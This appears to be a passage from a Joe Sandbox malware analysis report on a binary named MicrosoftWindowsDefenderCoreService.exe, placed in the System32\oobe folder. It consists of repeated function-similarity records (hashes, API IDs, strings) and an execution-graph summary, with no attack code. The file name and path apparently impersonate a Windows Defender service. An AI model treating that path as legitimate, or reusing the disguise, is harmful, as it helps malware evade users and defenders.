                                                                                                      • Instruction Fuzzy Hash: 4181C431D0C6C2CBFB6D7A2DA258239EA92AF11748FD45032C94E569D5CB2DE801F239

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 4e72a78afc033ce412dcfac9bfc7b6e783b7367c1d82e14657b0475efbf5066c
• Instruction ID: 4a48ae7916129731563a4faeeb76adaf3059b61a995f3153fee1dd65605c43d6
• Opcode Fuzzy Hash: 4e72a78afc033ce412dcfac9bfc7b6e783b7367c1d82e14657b0475efbf5066c
• Instruction Fuzzy Hash: 7291F173A08781CAE714EB64F4802ADBBA1F704788F54413AEE8C17755DF38E996D724

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: 304309c19993bd8ade6526e907a9e90410f75ec28ddd64bd65e9413e692c37fe
• Instruction ID: 72cc8aaae3066a26343ad90fccaf8bde5f5a9508b8c66ae687baf9faa1590706
• Opcode Fuzzy Hash: 304309c19993bd8ade6526e907a9e90410f75ec28ddd64bd65e9413e692c37fe
• Instruction Fuzzy Hash: 7E51AC36B1A602CAEB1CEB15F044A78A396FB54B88F918131DE5A43788DF7DEC41D724

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: 80008918aa73afb691e5de68afa07868eca546d8f81fed6c896487fa01ad9c07
• Instruction ID: 9b9469db506cc016de921052db259b3ea021485da16960362ddc21bd71b407eb
• Opcode Fuzzy Hash: 80008918aa73afb691e5de68afa07868eca546d8f81fed6c896487fa01ad9c07
• Instruction Fuzzy Hash: 8651A7B2908341C6EB78AF11A484268B7A2FB44B84F944135DA6D47B95CF3CEC62D738

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
• Opcode ID: 13e6be0cdf2e1c89e698b7cb498a147cdf67c7efa57d0f18788b81dbc0e46aff
• Instruction ID: 78fce177a851086e11610d6108e272c1fdc3541a1d880bcf46d8f15fc64d3613
• Opcode Fuzzy Hash: 13e6be0cdf2e1c89e698b7cb498a147cdf67c7efa57d0f18788b81dbc0e46aff
• Instruction Fuzzy Hash: 5961AF32908BC5C1D734AB25F4443AAB7A1FB94B88F844225EB9D03B95DF3CD591CB24

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2775327233-1405518554
• Opcode ID: a236d3788c6dc273956d2bd0d737d1f2c70b8b760a15bc821f3a65a0eb825694
• Instruction ID: 1744306028383a1437ce1276389a13beed6517ba2a3c3a4c678924c7bad045fc
• Opcode Fuzzy Hash: a236d3788c6dc273956d2bd0d737d1f2c70b8b760a15bc821f3a65a0eb825694
• Instruction Fuzzy Hash: AB416F32B0AA41C9EB18EF71E8906BD7365EF44748F880435DB4D27A99CE38D511A3B9

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: EnvironmentFreeStrings$Heap$AllocateErrorLast
• String ID: COMSPEC
• API String ID: 1848424169-1631433037
• Opcode ID: a35ff489d0d3ba14193343ce58dfbc904a4c6568c23973069f1c9c1939171e9d
• Instruction ID: 92474ada80501f8914c7d88a0cfd1161a1a30b0ae98e113494c2fa5d5025d24c
• Opcode Fuzzy Hash: a35ff489d0d3ba14193343ce58dfbc904a4c6568c23973069f1c9c1939171e9d
• Instruction Fuzzy Hash: A4319731A08756C2E628BF2A744007AB694BB44BD4FC44239E99E47FD5DF3CE4419378

APIs
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: 6bea90274e1ddf0261b549dafed0cd0423df2629b60b0ba69d4055811051c5d3
• Instruction ID: 716ad81f2b817d1022386502696ea26f937c32a1d0a881d2aac7c6705671fbd7
• Opcode Fuzzy Hash: 6bea90274e1ddf0261b549dafed0cd0423df2629b60b0ba69d4055811051c5d3
• Instruction Fuzzy Hash: 12D1EE72B08A81C9E715DB79E4442BCB7B1FB44B98B844236CE5D97B89DE38E407D324

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: e70901659d5a215cad6da5922abb1148b3ee112d15c305ba5e56ac954c0709b8
• Instruction ID: 8d930a9948303d07a6c33dd4783551782edd661260b63c18412a27058b975334
• Opcode Fuzzy Hash: e70901659d5a215cad6da5922abb1148b3ee112d15c305ba5e56ac954c0709b8
• Instruction Fuzzy Hash: C0416022A08B45C5EA19EB16F45017AA364FB88F84F984133DE8E43765DF3CE445DB39

APIs
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 497246f021e04b2bbef846a64232120c5a6b46ee7efe2ac5d883071b72bec3f9
• Instruction ID: cbffbc700ef06d4490594680fdc843d2c12e1d8e3ed099041e5169697e8859cc
• Opcode Fuzzy Hash: 497246f021e04b2bbef846a64232120c5a6b46ee7efe2ac5d883071b72bec3f9
• Instruction Fuzzy Hash: 78111C22B14F01C9EB00AF60E8542B873A4FB59B58F840E35DA6D867A4DF7CD1A4D364
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CodeInfoPageValid
                                                                                                      • String ID: COMSPEC
                                                                                                      • API String ID: 546120528-1631433037
                                                                                                      • Opcode ID: 4af0dbb684c724fe96bf341664f4c603cd190a363433aeae2eaa4d0cfb01c452
                                                                                                      • Instruction ID: 0302cd2f664b8036eeed45ec7c03b84921f698889ead991e5067d99781545401
                                                                                                      • Opcode Fuzzy Hash: 4af0dbb684c724fe96bf341664f4c603cd190a363433aeae2eaa4d0cfb01c452
                                                                                                      • Instruction Fuzzy Hash: 58818F62A08682D6F76DAF29F050179F7A2FB44780FC84036C68E47A90DE3DE545E338
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __except_validate_context_record
                                                                                                      • String ID: csm$csm
                                                                                                      • API String ID: 1467352782-3733052814
                                                                                                      • Opcode ID: 1f6efa882bf4f4cf33d0bfbb7f6dec5b5492705073dcf45ce2cc2171be57f55a
                                                                                                      • Instruction ID: 4b9fac85accd45bf298d090c4bb4895758bdf2a6cf5d7fdd90d2f5682bd61156
                                                                                                      • Opcode Fuzzy Hash: 1f6efa882bf4f4cf33d0bfbb7f6dec5b5492705073dcf45ce2cc2171be57f55a
                                                                                                      • Instruction Fuzzy Hash: 0071C232908691C6D778AF25E080779BBA2FB44F84F448131DA9D47685CF3CD852D764
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2558813199-1018135373
                                                                                                      • Opcode ID: f9b199feffe51fe14d700ed6b556c1e2233788361c1b5b39dfb5c3d1f05c27eb
                                                                                                      • Instruction ID: f9e4df2143d827b2a670a59dcb276ad49fe55e5e78b4416058cbb70e205e464f
                                                                                                      • Opcode Fuzzy Hash: f9b199feffe51fe14d700ed6b556c1e2233788361c1b5b39dfb5c3d1f05c27eb
                                                                                                      • Instruction Fuzzy Hash: 20516D32A19741C6E628AB15F48026EB7A5FB88B91F540534EF8D07B56CF3CE891DB24
                                                                                                      Strings
                                                                                                      • C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe, xrefs: 00007FF76E19E2E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                      • String ID: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe
                                                                                                      • API String ID: 3580290477-1991816072
                                                                                                      • Opcode ID: c7ce43bd8065d113563e93934c7efb2166c296d5945c70c02e0617e6608e1cbd
                                                                                                      • Instruction ID: 8f28251947a1f75bc3877b9bf567ee38ec08ece0f5a720f728059cef83be5a09
                                                                                                      • Opcode Fuzzy Hash: c7ce43bd8065d113563e93934c7efb2166c296d5945c70c02e0617e6608e1cbd
                                                                                                      • Instruction Fuzzy Hash: 4B417132A08616C6EB1DEF25F4401BCA795FB44B84B844035E94E87B95DF3CEA819738
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: 661a253012c350d1591fa1e673cc383de945a6ecb0d554cda199366c01c008e0
                                                                                                      • Instruction ID: 08285e0f34adff1b9885e52338761e48ad4e97754d745154a4e4d7c4fc843c5f
                                                                                                      • Opcode Fuzzy Hash: 661a253012c350d1591fa1e673cc383de945a6ecb0d554cda199366c01c008e0
                                                                                                      • Instruction Fuzzy Hash: 09418362B18A41C1DB149F25F4443BDA7A1FB84794F804131DE4D87B98DF3CD445D764
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                      • String ID: ios_base::failbit set
                                                                                                      • API String ID: 1109970293-3924258884
                                                                                                      • Opcode ID: ad205b503376cc66794e463eec2ea4e0d7f3e8de40c10478924d38c4c25f27c2
                                                                                                      • Instruction ID: ad95344092209cf65c9689bac5537161604d27f60b648f20554d73b579dde033
                                                                                                      • Opcode Fuzzy Hash: ad205b503376cc66794e463eec2ea4e0d7f3e8de40c10478924d38c4c25f27c2
                                                                                                      • Instruction Fuzzy Hash: 0E21E962E18BC5C1E7049B24F4411BAA360FF597A0F54A331EAAC127D5EF2CD5D4C324
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ios_base::failbit set
                                                                                                      • API String ID: 0-3924258884
                                                                                                      • Opcode ID: fcec7a1fe12a37619028288773bb44af9363bc22db796437b84b984bbf840e31
                                                                                                      • Instruction ID: 2ed8e5abecbdfbbd70f3bfc0c17bbe7501988ef262b6462a1828c7e6f6229d39
                                                                                                      • Opcode Fuzzy Hash: fcec7a1fe12a37619028288773bb44af9363bc22db796437b84b984bbf840e31
                                                                                                      • Instruction Fuzzy Hash: 75213B52B09742C5EA187B11B4003BAA1449B047E4F940731DE7D077C2DE3CA582B335
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 03fb329d4361a2ddeb27f03ccd46364298fd356b6db149a3cdc49d9177b62aae
                                                                                                      • Instruction ID: c2cc1af041719a4114c2a0f9e077359cc92fe599d9f7384e1d5a73c515403979
                                                                                                      • Opcode Fuzzy Hash: 03fb329d4361a2ddeb27f03ccd46364298fd356b6db149a3cdc49d9177b62aae
                                                                                                      • Instruction Fuzzy Hash: EA111C32618B41C2EB259B15F444269B7E5FB88B84F984231DE8C07B58DF3CD951DB14
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Xinvalid_argument__std_exception_copystd::_
                                                                                                      • String ID: string too long
                                                                                                      • API String ID: 2536225881-2556327735
                                                                                                      • Opcode ID: 19607974dd3a492329af1dcf59571df2ac1afc7934e5d7e8f422ccd63231f6ad
                                                                                                      • Instruction ID: a2e479c3760d67d4474b8b6de417dab8403e709017c8158f17af7d1470b931c4
                                                                                                      • Opcode Fuzzy Hash: 19607974dd3a492329af1dcf59571df2ac1afc7934e5d7e8f422ccd63231f6ad
                                                                                                      • Instruction Fuzzy Hash: E5E06D61A14B49D1EB09BF21F8800B8B3A1EF68B00BD49232D95C46361EE2CE1E5D324

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:7.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:1637
                                                                                                      Total number of Limit Nodes:9
                                                                                                      execution_graph (serialized node/edge list behind the report's interactive graph view; this copy is cut off mid-record)
                                                                                                      • Record format: <node id> <address> [labels], and <id>-><id> for a directed edge; a label is either a bare Win32 import name or a CRT/exception-handling internal with its sub-call count (e.g. "_CreateFrameInfo 38 API calls")
                                                                                                      • Nodes that begin each listed sub-graph: 7111 (7ff7aa95553c), 6886 (7ff7aa95abc0), 6925 (7ff7aa9607c0), 7363 (7ff7aa95fcc0), 7887 (7ff7aa95fc40), 6931 (7ff7aa9527c0), 6942 (7ff7aa95a3d0), 7134 (7ff7aa95c150), 7377 (7ff7aa958e9c)
                                                                                                      • Win32 APIs reached: GetStartupInfoW, GetFileType, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetUnhandledExceptionFilter, GetCommandLineA, GetCommandLineW, RtlUnwindEx, FindFirstFileExW, MultiByteToWideChar, WideCharToMultiByte
                                                                                                      • CRT / exception-handling internals labelled: __CxxCallCatchBlock, __FrameHandler3::GetHandlerSearchState, _CreateFrameInfo, Is_bad_exception_allowed, _set_fmode, _invalid_parameter_noinfo, _invalid_parameter_noinfo_noreturn, __free_lconv_mon, __GSHandlerCheckCommon, _IsNonwritableInCurrentImage, __except_validate_context_record, __vcrt_InitializeCriticalSectionEx
